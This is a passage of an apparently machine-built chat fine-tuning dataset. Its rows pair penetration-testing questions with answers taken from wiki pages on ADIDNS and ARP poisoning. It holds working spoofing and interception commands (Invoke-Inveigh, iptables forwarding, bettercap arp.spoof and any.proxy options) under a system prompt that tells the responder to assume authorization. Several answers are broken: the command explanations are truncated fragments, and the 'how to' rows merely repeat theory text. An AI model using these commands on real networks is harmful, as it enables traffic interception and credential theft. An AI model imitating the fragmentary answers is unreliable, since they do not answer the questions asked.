-mDNS Y -Challenge 1122334455667788 -MachineAccounts Y"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform ADIDNS poisoning - Dynamic spoofing?", "response": "Invoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y", "metadata": {"corpus_index": 782, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Invoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y`?"}, {"role": "assistant", "content": "This command is used for adidns poisoning - dynamic spoofing. Dynamic spoofing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Invoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y`?", "response": "This command is used for adidns poisoning - dynamic spoofing. Dynamic spoofing", "metadata": {"corpus_index": 782, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about ARP poisoning - Theory"}, {"role": "assistant", "content": "The ARP (Address Resolution Protocol) is used to link IPv4 addresses with MAC addresses, allowing machines to communicate within networks. Since that protocol works in broadcast, attackers can try to impersonate machines by answering ARP requests (_\"Who is using address 192.168.56.1? I am!\"_) or by flooding the network with ARP announcements (_\"Hey everyone, nobody asked but I'm the one using address 192.168.56.1\"_). This is called ARP spoofing (also called ARP poisoning).\n\n> [!TIP]\n> ARP Reply is accepted by a host without any verification, even if it didn’t send an ARP request ! (for performance purpose). The ARP table is being updated if the reply is different from the actual entry."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about ARP poisoning - Theory", "response": "The ARP (Address Resolution Protocol) is used to link IPv4 addresses with MAC addresses, allowing machines to communicate within networks. Since that protocol works in broadcast, attackers can try to impersonate machines by answering ARP requests (_\"Who is using address 192.168.56.1? I am!\"_) or by flooding the network with ARP announcements (_\"Hey everyone, nobody asked but I'm the one using address 192.168.56.1\"_). This is called ARP spoofing (also called ARP poisoning).\n\n> [!TIP]\n> ARP Reply is accepted by a host without any verification, even if it didn’t send an ARP request ! (for performance purpose). The ARP table is being updated if the reply is different from the actual entry.", "metadata": {"corpus_index": 783, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute ARP poisoning - Theory?"}, {"role": "assistant", "content": "The ARP (Address Resolution Protocol) is used to link IPv4 addresses with MAC addresses, allowing machines to communicate within networks. Since that protocol works in broadcast, attackers can try to impersonate machines by answering ARP requests (_\"Who is using address 192.168.56.1? I am!\"_) or by flooding the network with ARP announcements (_\"Hey everyone, nobody asked but I'm the one using address 192.168.56.1\"_). This is called ARP spoofing (also called ARP poisoning).\n\n> [!TIP]\n> ARP Reply is accepted by a host without any verification, even if it didn’t send an ARP request ! (for performance purpose). The ARP table is being updated if the reply is different from the actual entry."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute ARP poisoning - Theory?", "response": "The ARP (Address Resolution Protocol) is used to link IPv4 addresses with MAC addresses, allowing machines to communicate within networks. Since that protocol works in broadcast, attackers can try to impersonate machines by answering ARP requests (_\"Who is using address 192.168.56.1? I am!\"_) or by flooding the network with ARP announcements (_\"Hey everyone, nobody asked but I'm the one using address 192.168.56.1\"_). This is called ARP spoofing (also called ARP poisoning).\n\n> [!TIP]\n> ARP Reply is accepted by a host without any verification, even if it didn’t send an ARP request ! (for performance purpose). The ARP table is being updated if the reply is different from the actual entry.", "metadata": {"corpus_index": 783, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does ARP poisoning - Proxy vs. Rerouting work?"}, {"role": "assistant", "content": "The two major use cases of ARP spoofing are the following.\n\n1. Proxy: intercepting, forwarding and snooping or tampering with packets exchanged between a client and a server. This technique usually implies that the attacker has to poison the client's ARP table and replace the server's MAC address in it by its own, but also the server's ARP table (or the gateway's depending on the network topology) to replace the client's MAC address in it by its own. Outgoing and incoming packets then get intercepted and can be tampered with or spied on.\n2. Rerouting: Intercepting a set of packets sent by a client to a server and forwarding them to an evil server. This technique implies that the attacker only has to poison the client's ARP table and replace the server's MAC address in it by its own. The attacker then has to have an evil server capable of behaving like the spoofed one."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does ARP poisoning - Proxy vs. Rerouting work?", "response": "The two major use cases of ARP spoofing are the following.\n\n1. Proxy: intercepting, forwarding and snooping or tampering with packets exchanged between a client and a server. This technique usually implies that the attacker has to poison the client's ARP table and replace the server's MAC address in it by its own, but also the server's ARP table (or the gateway's depending on the network topology) to replace the client's MAC address in it by its own. Outgoing and incoming packets then get intercepted and can be tampered with or spied on.\n2. Rerouting: Intercepting a set of packets sent by a client to a server and forwarding them to an evil server. This technique implies that the attacker only has to poison the client's ARP table and replace the server's MAC address in it by its own. The attacker then has to have an evil server capable of behaving like the spoofed one.", "metadata": {"corpus_index": 784, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out ARP poisoning - Proxy vs. Rerouting during a pentest?"}, {"role": "assistant", "content": "The two major use cases of ARP spoofing are the following.\n\n1. Proxy: intercepting, forwarding and snooping or tampering with packets exchanged between a client and a server. This technique usually implies that the attacker has to poison the client's ARP table and replace the server's MAC address in it by its own, but also the server's ARP table (or the gateway's depending on the network topology) to replace the client's MAC address in it by its own. Outgoing and incoming packets then get intercepted and can be tampered with or spied on.\n2. Rerouting: Intercepting a set of packets sent by a client to a server and forwarding them to an evil server. This technique implies that the attacker only has to poison the client's ARP table and replace the server's MAC address in it by its own. The attacker then has to have an evil server capable of behaving like the spoofed one."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out ARP poisoning - Proxy vs. Rerouting during a pentest?", "response": "The two major use cases of ARP spoofing are the following.\n\n1. Proxy: intercepting, forwarding and snooping or tampering with packets exchanged between a client and a server. This technique usually implies that the attacker has to poison the client's ARP table and replace the server's MAC address in it by its own, but also the server's ARP table (or the gateway's depending on the network topology) to replace the client's MAC address in it by its own. Outgoing and incoming packets then get intercepted and can be tampered with or spied on.\n2. Rerouting: Intercepting a set of packets sent by a client to a server and forwarding them to an evil server. This technique implies that the attacker only has to poison the client's ARP table and replace the server's MAC address in it by its own. The attacker then has to have an evil server capable of behaving like the spoofed one.", "metadata": {"corpus_index": 784, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about ARP poisoning - Attack scenarios?"}, {"role": "assistant", "content": "There are multiple scenarios where ARP spoofing can be used to operate lateral movement within Active Directory domains (not an comprehensive list).\n\n1. NTLM capture and NTLM relay : spoof an SMB server and reroute received SMB packets to internal capture or relay servers (rerouting technique).\n2. DNS spoofing : spoof an internal DNS server, so that DNS queries can be answered with fake resolutions (rerouting technique).\n3. WSUS spoofing : spoof the WSUS server and deliver evil configurations to Windows clients. This can either be done by intercepting all update request and running a fully functional WSUS server (rerouting technique) or by intercepting, forwarding and tampering packets between clients and the legitimate WSUS server (proxy technique). \n4. Dumping network secrets : reroute any traffic and dump secrets that were insecurely sent (i.e. FTP, HTTP, SMTP, ...). In this scenario, both outgoing and incoming traffic should be captured. This implies the poisoning of both the client's and the server's ARP tables (proxy technique)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about ARP poisoning - Attack scenarios?", "response": "There are multiple scenarios where ARP spoofing can be used to operate lateral movement within Active Directory domains (not an comprehensive list).\n\n1. NTLM capture and NTLM relay : spoof an SMB server and reroute received SMB packets to internal capture or relay servers (rerouting technique).\n2. DNS spoofing : spoof an internal DNS server, so that DNS queries can be answered with fake resolutions (rerouting technique).\n3. WSUS spoofing : spoof the WSUS server and deliver evil configurations to Windows clients. This can either be done by intercepting all update request and running a fully functional WSUS server (rerouting technique) or by intercepting, forwarding and tampering packets between clients and the legitimate WSUS server (proxy technique). \n4. Dumping network secrets : reroute any traffic and dump secrets that were insecurely sent (i.e. FTP, HTTP, SMTP, ...). In this scenario, both outgoing and incoming traffic should be captured. This implies the poisoning of both the client's and the server's ARP tables (proxy technique).", "metadata": {"corpus_index": 785, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for ARP poisoning - Attack scenarios?"}, {"role": "assistant", "content": "There are multiple scenarios where ARP spoofing can be used to operate lateral movement within Active Directory domains (not an comprehensive list).\n\n1. NTLM capture and NTLM relay : spoof an SMB server and reroute received SMB packets to internal capture or relay servers (rerouting technique).\n2. DNS spoofing : spoof an internal DNS server, so that DNS queries can be answered with fake resolutions (rerouting technique).\n3. WSUS spoofing : spoof the WSUS server and deliver evil configurations to Windows clients. This can either be done by intercepting all update request and running a fully functional WSUS server (rerouting technique) or by intercepting, forwarding and tampering packets between clients and the legitimate WSUS server (proxy technique). \n4. Dumping network secrets : reroute any traffic and dump secrets that were insecurely sent (i.e. FTP, HTTP, SMTP, ...). In this scenario, both outgoing and incoming traffic should be captured. This implies the poisoning of both the client's and the server's ARP tables (proxy technique)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for ARP poisoning - Attack scenarios?", "response": "There are multiple scenarios where ARP spoofing can be used to operate lateral movement within Active Directory domains (not an comprehensive list).\n\n1. NTLM capture and NTLM relay : spoof an SMB server and reroute received SMB packets to internal capture or relay servers (rerouting technique).\n2. DNS spoofing : spoof an internal DNS server, so that DNS queries can be answered with fake resolutions (rerouting technique).\n3. WSUS spoofing : spoof the WSUS server and deliver evil configurations to Windows clients. This can either be done by intercepting all update request and running a fully functional WSUS server (rerouting technique) or by intercepting, forwarding and tampering packets between clients and the legitimate WSUS server (proxy technique). \n4. Dumping network secrets : reroute any traffic and dump secrets that were insecurely sent (i.e. FTP, HTTP, SMTP, ...). In this scenario, both outgoing and incoming traffic should be captured. This implies the poisoning of both the client's and the server's ARP tables (proxy technique).", "metadata": {"corpus_index": 785, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is ARP poisoning - Network topology?"}, {"role": "assistant", "content": "Besides the scenarios mentioned above, many network topologies exist and ARP poisoning attacks need to be carefully prepared based on that topology. Below are some common examples.\n\n1. One segment: the client, the server, and the attacker are on the same network segment. The ARP tables can be poisoned with the attacker spoofing either the client or the server.\n2. Two segments: the client and the attacker are on the same network segment but the server is on another one. For a hijacking attack, the client's ARP table can be poisoned with the attacker posing as the client's gateway. For a relaying attack, the gateway's ARP table also has to be poisoned with the attacker posing as the client. \n3. Three segments: all three machines are on different network segments. For both hijacking and relaying attacks, I'm not sure what can be done... :man_shrugging:"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is ARP poisoning - Network topology?", "response": "Besides the scenarios mentioned above, many network topologies exist and ARP poisoning attacks need to be carefully prepared based on that topology. Below are some common examples.\n\n1. One segment: the client, the server, and the attacker are on the same network segment. The ARP tables can be poisoned with the attacker spoofing either the client or the server.\n2. Two segments: the client and the attacker are on the same network segment but the server is on another one. For a hijacking attack, the client's ARP table can be poisoned with the attacker posing as the client's gateway. For a relaying attack, the gateway's ARP table also has to be poisoned with the attacker posing as the client. \n3. Three segments: all three machines are on different network segments. For both hijacking and relaying attacks, I'm not sure what can be done... :man_shrugging:", "metadata": {"corpus_index": 786, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out ARP poisoning - Network topology during a pentest?"}, {"role": "assistant", "content": "Besides the scenarios mentioned above, many network topologies exist and ARP poisoning attacks need to be carefully prepared based on that topology. Below are some common examples.\n\n1. One segment: the client, the server, and the attacker are on the same network segment. The ARP tables can be poisoned with the attacker spoofing either the client or the server.\n2. Two segments: the client and the attacker are on the same network segment but the server is on another one. For a hijacking attack, the client's ARP table can be poisoned with the attacker posing as the client's gateway. For a relaying attack, the gateway's ARP table also has to be poisoned with the attacker posing as the client. \n3. Three segments: all three machines are on different network segments. For both hijacking and relaying attacks, I'm not sure what can be done... :man_shrugging:"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out ARP poisoning - Network topology during a pentest?", "response": "Besides the scenarios mentioned above, many network topologies exist and ARP poisoning attacks need to be carefully prepared based on that topology. Below are some common examples.\n\n1. One segment: the client, the server, and the attacker are on the same network segment. The ARP tables can be poisoned with the attacker spoofing either the client or the server.\n2. Two segments: the client and the attacker are on the same network segment but the server is on another one. For a hijacking attack, the client's ARP table can be poisoned with the attacker posing as the client's gateway. For a relaying attack, the gateway's ARP table also has to be poisoned with the attacker posing as the client. \n3. Three segments: all three machines are on different network segments. For both hijacking and relaying attacks, I'm not sure what can be done... :man_shrugging:", "metadata": {"corpus_index": 786, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is ARP poisoning - Practice?"}, {"role": "assistant", "content": "> [!WARNING]\n> Since spoofing every address in a subnet can cause temporary but severe disruption in that subnet, it is highly recommended to target specific addresses and machines while doing ARP spoofing.\n\nThe best tool to operate ARP poisoning is bettercap (Go) and for the majority of the scenarios, basic knowledge of the iptables utility is required."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is ARP poisoning - Practice?", "response": "> [!WARNING]\n> Since spoofing every address in a subnet can cause temporary but severe disruption in that subnet, it is highly recommended to target specific addresses and machines while doing ARP spoofing.\n\nThe best tool to operate ARP poisoning is bettercap (Go) and for the majority of the scenarios, basic knowledge of the iptables utility is required.", "metadata": {"corpus_index": 787, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for ARP poisoning - Practice"}, {"role": "assistant", "content": "> [!WARNING]\n> Since spoofing every address in a subnet can cause temporary but severe disruption in that subnet, it is highly recommended to target specific addresses and machines while doing ARP spoofing.\n\nThe best tool to operate ARP poisoning is bettercap (Go) and for the majority of the scenarios, basic knowledge of the iptables utility is required."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for ARP poisoning - Practice", "response": "> [!WARNING]\n> Since spoofing every address in a subnet can cause temporary but severe disruption in that subnet, it is highly recommended to target specific addresses and machines while doing ARP spoofing.\n\nThe best tool to operate ARP poisoning is bettercap (Go) and for the majority of the scenarios, basic knowledge of the iptables utility is required.", "metadata": {"corpus_index": 787, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe ARP poisoning - Networking in the context of penetration testing"}, {"role": "assistant", "content": "In order to forward packets, the system has to be prepared accordingly. The first step is to make sure the system firewall can effectively forward packets. The easiest way of achieving this is to write an ACCEPT policy in the FORWARD chain.\n\n``bash\niptables --policy FORWARD ACCEPT\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe ARP poisoning - Networking in the context of penetration testing", "response": "In order to forward packets, the system has to be prepared accordingly. The first step is to make sure the system firewall can effectively forward packets. The easiest way of achieving this is to write an ACCEPT policy in the FORWARD chain.\n\n``bash\niptables --policy FORWARD ACCEPT\n``", "metadata": {"corpus_index": 788, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through ARP poisoning - Networking"}, {"role": "assistant", "content": "In order to forward packets, the system has to be prepared accordingly. The first step is to make sure the system firewall can effectively forward packets. The easiest way of achieving this is to write an ACCEPT policy in the FORWARD chain.\n\n``bash\niptables --policy FORWARD ACCEPT\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through ARP poisoning - Networking", "response": "In order to forward packets, the system has to be prepared accordingly. The first step is to make sure the system firewall can effectively forward packets. The easiest way of achieving this is to write an ACCEPT policy in the FORWARD chain.\n\n``bash\niptables --policy FORWARD ACCEPT\n``", "metadata": {"corpus_index": 788, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the iptables command for arp poisoning - networking"}, {"role": "assistant", "content": "iptables --policy FORWARD ACCEPT"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the iptables command for arp poisoning - networking", "response": "iptables --policy FORWARD ACCEPT", "metadata": {"corpus_index": 789, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "iptables"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform ARP poisoning - Networking?"}, {"role": "assistant", "content": "iptables --policy FORWARD ACCEPT"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform ARP poisoning - Networking?", "response": "iptables --policy FORWARD ACCEPT", "metadata": {"corpus_index": 789, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `iptables --policy FORWARD ACCEPT`?"}, {"role": "assistant", "content": "This command is used for arp poisoning - networking. Networking"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `iptables --policy FORWARD ACCEPT`?", "response": "This command is used for arp poisoning - networking. Networking", "metadata": {"corpus_index": 789, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain ARP poisoning - ARP poisoning"}, {"role": "assistant", "content": "Bettercap's arp.spoof module has multiple options that allow multiple scenarios\n\n* arp.spoof.targets is the list of targets whose ARP tables will be poisoned\n* arp.spoof.internal is an option that allows bettercap to choose which addresses to spoof. If set to true, machines from the same subnet as the client victim will be spoofed (i.e. their IP addresses will be matched to the attacker's MAC address on the victim client's ARP table). To put it simply, this option needs to be set to true when the attacker wants to be the man-in-the-middle between two machines of a same subnet. When the victim client and the spoofed server are on different subnets, this option can be left to false.\n* arp.spoof.fullduplex is an option that, when set to true, will make bettercap automatically try to poison the gateway's ARP table so that packets aimed at the victim client also get intercepted.\n* arp.spoof is a trigger to set to on when starting the ARP poisoning, off when stopping it. This trigger will also enable packets forwarding (i.e. write 1 in /proc/sys/net/ip/ip_forward) while the arp.ban trigger will disabled that and the poisoned victim will not have access to the spoofed machines anymore."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain ARP poisoning - ARP poisoning", "response": "Bettercap's arp.spoof module has multiple options that allow multiple scenarios\n\n* arp.spoof.targets is the list of targets whose ARP tables will be poisoned\n* arp.spoof.internal is an option that allows bettercap to choose which addresses to spoof. If set to true, machines from the same subnet as the client victim will be spoofed (i.e. their IP addresses will be matched to the attacker's MAC address on the victim client's ARP table). To put it simply, this option needs to be set to true when the attacker wants to be the man-in-the-middle between two machines of a same subnet. When the victim client and the spoofed server are on different subnets, this option can be left to false.\n* arp.spoof.fullduplex is an option that, when set to true, will make bettercap automatically try to poison the gateway's ARP table so that packets aimed at the victim client also get intercepted.\n* arp.spoof is a trigger to set to on when starting the ARP poisoning, off when stopping it. This trigger will also enable packets forwarding (i.e. write 1 in /proc/sys/net/ip/ip_forward) while the arp.ban trigger will disabled that and the poisoned victim will not have access to the spoofed machines anymore.", "metadata": {"corpus_index": 790, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out ARP poisoning - ARP poisoning during a pentest?"}, {"role": "assistant", "content": "Bettercap's arp.spoof module has multiple options that allow multiple scenarios\n\n* arp.spoof.targets is the list of targets whose ARP tables will be poisoned\n* arp.spoof.internal is an option that allows bettercap to choose which addresses to spoof. If set to true, machines from the same subnet as the client victim will be spoofed (i.e. their IP addresses will be matched to the attacker's MAC address on the victim client's ARP table). To put it simply, this option needs to be set to true when the attacker wants to be the man-in-the-middle between two machines of a same subnet. When the victim client and the spoofed server are on different subnets, this option can be left to false.\n* arp.spoof.fullduplex is an option that, when set to true, will make bettercap automatically try to poison the gateway's ARP table so that packets aimed at the victim client also get intercepted.\n* arp.spoof is a trigger to set to on when starting the ARP poisoning, off when stopping it. This trigger will also enable packets forwarding (i.e. write 1 in /proc/sys/net/ip/ip_forward) while the arp.ban trigger will disabled that and the poisoned victim will not have access to the spoofed machines anymore."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out ARP poisoning - ARP poisoning during a pentest?", "response": "Bettercap's arp.spoof module has multiple options that allow multiple scenarios\n\n* arp.spoof.targets is the list of targets whose ARP tables will be poisoned\n* arp.spoof.internal is an option that allows bettercap to choose which addresses to spoof. If set to true, machines from the same subnet as the client victim will be spoofed (i.e. their IP addresses will be matched to the attacker's MAC address on the victim client's ARP table). To put it simply, this option needs to be set to true when the attacker wants to be the man-in-the-middle between two machines of a same subnet. When the victim client and the spoofed server are on different subnets, this option can be left to false.\n* arp.spoof.fullduplex is an option that, when set to true, will make bettercap automatically try to poison the gateway's ARP table so that packets aimed at the victim client also get intercepted.\n* arp.spoof is a trigger to set to on when starting the ARP poisoning, off when stopping it. This trigger will also enable packets forwarding (i.e. write 1 in /proc/sys/net/ip/ip_forward) while the arp.ban trigger will disabled that and the poisoned victim will not have access to the spoofed machines anymore.", "metadata": {"corpus_index": 790, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about ARP poisoning - Packet forwarding"}, {"role": "assistant", "content": "Bettercap also has the any.proxy module that has multiple options to allows multiple scenarios\n\n* any.proxy.iface allows to set the interface to redirect packets from\n* any.proxy.protocol can be set to UDP or TCP to specify on which transport protocol the packets to reroute will transit \n* any.proxy.src_address refers to the destination address of the packets to reroute. This usually has to be set to the spoofed server IP address. Packets that were originally sent to that server will be rerouted and sent to another one. This option has to be set when doing the rerouting technique.This option can be blank. Bettercap will then reroute every packet received without filtering on the address. For instance, this is useful when doing a WSUS or DNS spoofing attack on multiple victims at the same time.\n* any.proxy.src_port refers to the destination port of the packets to reroute. This usally has to be set to the spoofed service port. Packets that were originally sent to that server will be rerouted and sent to another one. This option has to be set when doing the rerouting technique.\n* any.proxy.dst_address refers to the IP address the matched packets are to be sent to. For instance, when doing WSUS or DNS spoofing attacks in a rerouting technique mode, this option has to be set to the IP address of the attacker's server.\n* any.proxy.dst_port refers to the port the matched packets are to be sent to."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": 